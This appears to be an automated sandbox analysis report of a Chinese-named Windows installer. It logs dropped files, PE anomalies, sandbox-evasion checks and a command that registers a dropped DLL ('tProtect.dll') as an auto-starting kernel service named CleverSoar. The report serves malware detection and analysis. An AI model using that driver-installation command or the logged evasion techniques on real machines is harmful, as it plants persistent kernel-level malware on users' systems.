Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.1.dr Static PE information: section name: .00cfg
Source: update.vac.1.dr Static PE information: section name: .voltbl
Source: update.vac.1.dr Static PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: update.vac.6.dr Static PE information: section name: .00cfg
Source: update.vac.6.dr Static PE information: section name: .voltbl
Source: update.vac.6.dr Static PE information: section name: .j)q
Source: is-7F262.tmp.6.dr Static PE information: section name: .xdata
Source: updat4.vac.6.dr Static PE information: section name: .00cfg
Source: updat4.vac.6.dr Static PE information: section name: .voltbl
Source: updat4.vac.6.dr Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6750B push ecx; ret 6_2_6CA6751E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C910F00 push ss; retn 0001h 6_2_6C910F0A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB34F10 push eax; ret 6_2_6CB34F2E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA999F4 push 004AC35Ch; ret 6_2_6CA99A0E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB35290 push eax; ret 6_2_6CB352BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003845F4 push 0042C35Ch; ret 10_2_0038460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041FB10 push eax; ret 10_2_0041FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041FE90 push eax; ret 10_2_0041FEBE
Source: update.vac.1.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac Jump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-7F262.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\updat4.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\updat4.vac Jump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5147 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4572 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 569 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 536 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 506 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-7F262.tmp Jump to dropped file
